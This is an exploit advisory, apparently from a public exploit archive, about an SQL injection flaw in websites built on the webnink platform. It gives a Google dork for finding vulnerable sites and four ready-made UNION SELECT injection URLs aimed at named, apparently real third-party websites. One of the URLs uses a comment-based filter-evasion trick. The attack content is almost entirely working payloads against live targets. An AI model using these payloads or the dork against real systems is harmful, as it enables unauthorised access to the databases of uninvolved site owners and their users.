*********************************************************
#Exploit Title: Powered by webnink Sql Injection Vulnerability
#Date: 2020-12-24
#Exploit Author: Behrouz Mansoori
#Vendor Homepage : https://webnink.com
#Google Dork: "Powered by webnink"
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Powered by webnink"
### Demo :
https://www.careerwayacademy.com/course-details.php?id=-12%27%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+
https://www.engineeranddecors.com/product-subcategory.php?Id=-5%27%20/*!12345union*/%20select%201,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17--+
https://www.rehabpictures.in/released-movies.php?id=-1%27%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9,10,11--+
http://www.beblec.com/product_name.php?id=8%20union%20select%201,version(),3,4,5,6,7,8--
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************